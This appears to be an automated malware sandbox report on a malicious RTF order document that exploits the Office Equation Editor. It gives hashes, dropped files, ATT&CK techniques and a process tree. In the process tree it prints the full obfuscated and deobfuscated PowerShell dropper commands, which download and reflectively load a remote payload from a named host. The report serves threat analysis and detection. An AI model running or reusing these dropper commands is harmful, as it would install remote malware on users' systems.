974dd7a8b2afaabc593b3e8f88bf19f52a742ca7b5c2f02f97125cdefba1b444

General

Target

Order PSL-6726 CGF0629.rtf
Size

73KB
MD5

ed87cf43c4a1bd2623e19f5138e6debc
SHA1

67671e0a3697ce7c72c52fe493241bebfbe86bc4
SHA256

974dd7a8b2afaabc593b3e8f88bf19f52a742ca7b5c2f02f97125cdefba1b444
SHA512

1ea604c8f58204522fe5bd2184207d86671f6a2740413361ae0f7698de9ba5ccc726ff81740d62c60d7ea41910d3776eb65c04e01dae400878a81de491127d92
SSDEEP

1536:I54pe+DwbMndXB/mmG4YgNU7K2w+r3TZpanJcSMsdDGatnQy8uvNQ13mQwADA2rr:IqpeEwodR/mayNp3sdDjwvr

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://cryptersandtools.minhacasa.tv/e/e

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
4	2144	EQNEDT32.EXE
6	2144	EQNEDT32.EXE
8	2636	powershell.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Office loads VBA resources, possible macro or embedded object present

Launches Equation Editor 1 TTPs 1 IoCs

Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

exploit

Exploitation for Client Execution

T1203

pid	Process
2144	EQNEDT32.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2316	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1628	powershell.exe
2636	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1628	powershell.exe
Token: SeDebugPrivilege	2636	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2316	WINWORD.EXE
2316	WINWORD.EXE

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 2144 wrote to memory of 2256	2144	EQNEDT32.EXE	30
PID 2144 wrote to memory of 2256	2144	EQNEDT32.EXE	30
PID 2144 wrote to memory of 2256	2144	EQNEDT32.EXE	30
PID 2144 wrote to memory of 2256	2144	EQNEDT32.EXE	30
PID 2256 wrote to memory of 1628	2256	WScript.exe	31
PID 2256 wrote to memory of 1628	2256	WScript.exe	31
PID 2256 wrote to memory of 1628	2256	WScript.exe	31
PID 2256 wrote to memory of 1628	2256	WScript.exe	31
PID 1628 wrote to memory of 2636	1628	powershell.exe	35
PID 1628 wrote to memory of 2636	1628	powershell.exe	35
PID 1628 wrote to memory of 2636	1628	powershell.exe	35
PID 1628 wrote to memory of 2636	1628	powershell.exe	35
PID 2316 wrote to memory of 2996	2316	WINWORD.EXE	36
PID 2316 wrote to memory of 2996	2316	WINWORD.EXE	36
PID 2316 wrote to memory of 2996	2316	WINWORD.EXE	36
PID 2316 wrote to memory of 2996	2316	WINWORD.EXE	36

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Order PSL-6726 CGF0629.rtf"
1⤵
- Drops file in Windows directory
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2316
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:2996

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2144
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\plaxggsdf.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2256
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC⁂Hk⁂d⁂Bl⁂Fs⁂XQBd⁂C⁂⁂J⁂BE⁂Ew⁂T⁂⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂QwBv⁂G4⁂dgBl⁂HI⁂d⁂Bd⁂Do⁂OgBG⁂HI⁂bwBt⁂EI⁂YQBz⁂GU⁂Ng⁂0⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂K⁂BO⁂GU⁂dw⁂t⁂E8⁂YgBq⁂GU⁂YwB0⁂C⁂⁂TgBl⁂HQ⁂LgBX⁂GU⁂YgBD⁂Gw⁂aQBl⁂G4⁂d⁂⁂p⁂C4⁂R⁂Bv⁂Hc⁂bgBs⁂G8⁂YQBk⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂JwBo⁂HQ⁂d⁂Bw⁂Do⁂Lw⁂v⁂GM⁂cgB5⁂H⁂⁂d⁂Bl⁂HI⁂cwBh⁂G4⁂Z⁂B0⁂G8⁂bwBs⁂HM⁂LgBt⁂Gk⁂bgBo⁂GE⁂YwBh⁂HM⁂YQ⁂u⁂HQ⁂dg⁂v⁂GU⁂LwBl⁂Cc⁂KQ⁂p⁂Ds⁂WwBT⁂Hk⁂cwB0⁂GU⁂bQ⁂u⁂EE⁂c⁂Bw⁂EQ⁂bwBt⁂GE⁂aQBu⁂F0⁂Og⁂6⁂EM⁂dQBy⁂HI⁂ZQBu⁂HQ⁂R⁂Bv⁂G0⁂YQBp⁂G4⁂LgBM⁂G8⁂YQBk⁂Cg⁂J⁂BE⁂Ew⁂T⁂⁂p⁂C4⁂RwBl⁂HQ⁂V⁂B5⁂H⁂⁂ZQ⁂o⁂Cc⁂RgBp⁂GI⁂ZQBy⁂C4⁂S⁂Bv⁂G0⁂ZQ⁂n⁂Ck⁂LgBH⁂GU⁂d⁂BN⁂GU⁂d⁂Bo⁂G8⁂Z⁂⁂o⁂Cc⁂VgBB⁂Ek⁂Jw⁂p⁂C4⁂SQBu⁂HY⁂bwBr⁂GU⁂K⁂⁂k⁂G4⁂dQBs⁂Gw⁂L⁂⁂g⁂Fs⁂bwBi⁂Go⁂ZQBj⁂HQ⁂WwBd⁂F0⁂I⁂⁂o⁂Cc⁂d⁂B4⁂HQ⁂LgB6⁂Gw⁂bwBt⁂Gk⁂cw⁂v⁂DU⁂NQ⁂u⁂Dk⁂N⁂⁂u⁂D⁂⁂MQ⁂x⁂C4⁂OQ⁂3⁂C8⁂Lw⁂6⁂H⁂⁂d⁂B0⁂Gg⁂Jw⁂p⁂Ck⁂';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('⁂','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1628
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://cryptersandtools.minhacasa.tv/e/e'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('txt.zlomis/55.94.011.97//:ptth'))"
      4⤵
      Blocklisted process makes network request
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2636

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Exploitation for Client Execution

1

T1203

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

Filesize
20KB

MD5
0f3910531118991a896e299a7990c1b1

SHA1
444cec180f06a42614c9f0756f622923e65635d9

SHA256
6b74b80ff9f6ddce5d33e4cfe4e06931e1b44794f455cc0928caf316589d7aca

SHA512
00a121cc2442f19df1d2dbca53dcf2f94ec5756d4518e68eae04c8ec0b46f2cd8ca700b892254415e351e2b2518ad84959dde6b9f8e51ecc9fd215339eab210e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\11A0C4FLA9NSGGQYYF2D.temp

Filesize
7KB

MD5
6ceef6db00c205a20a393d4b56145d83

SHA1
467c98feaca5ad101a297f66995d00df5a28ee67

SHA256
90772af0e874e4279e4dd5de4b1d63002df8ad07528b56865ccccf742822f871

SHA512
35d9b8ebc1ed3f32948f21a0df0d3b57150431943942c67957db057578511c86dd908ee4cea24991aea0827c79322548723074e7e3e799d450aca19f576a5c0d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
6ceef6db00c205a20a393d4b56145d83

SHA1
467c98feaca5ad101a297f66995d00df5a28ee67

SHA256
90772af0e874e4279e4dd5de4b1d63002df8ad07528b56865ccccf742822f871

SHA512
35d9b8ebc1ed3f32948f21a0df0d3b57150431943942c67957db057578511c86dd908ee4cea24991aea0827c79322548723074e7e3e799d450aca19f576a5c0d

Download Submit
C:\Users\Admin\AppData\Roaming\plaxggsdf.vbs

Filesize
319KB

MD5
a212b20fe28183bf03d1940453259756

SHA1
6da75981e2db2938380c8c60e8e3104bc290860f

SHA256
b26deca4941899b16be525c35b5f08abfa9960b547674739fb7f3d9af1095eaf

SHA512
da701600fc6d0bcf5f89b5edd2b233506a94563facd0ee73e8986813541741ac4c30a01fd5fc987111f28a737659b3367e1b7d271c65c4b1a7a5f02cf0b657da

Download Submit
C:\Users\Admin\AppData\Roaming\plaxggsdf.vbs

Filesize
319KB

MD5
a212b20fe28183bf03d1940453259756

SHA1
6da75981e2db2938380c8c60e8e3104bc290860f

SHA256
b26deca4941899b16be525c35b5f08abfa9960b547674739fb7f3d9af1095eaf

SHA512
da701600fc6d0bcf5f89b5edd2b233506a94563facd0ee73e8986813541741ac4c30a01fd5fc987111f28a737659b3367e1b7d271c65c4b1a7a5f02cf0b657da

Download Submit
memory/1628-83-0x0000000002760000-0x00000000027A0000-memory.dmp

Filesize
256KB

Download
memory/1628-84-0x0000000002760000-0x00000000027A0000-memory.dmp

Filesize
256KB

Download
memory/1628-97-0x0000000002760000-0x00000000027A0000-memory.dmp

Filesize
256KB

Download
memory/2316-54-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2316-121-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2636-90-0x0000000005000000-0x000000000500D000-memory.dmp

Filesize
52KB

Download
memory/2636-91-0x0000000005050000-0x0000000005062000-memory.dmp

Filesize
72KB

Download
memory/2636-92-0x0000000002880000-0x00000000028C0000-memory.dmp

Filesize
256KB

Download

Analysis

Sharing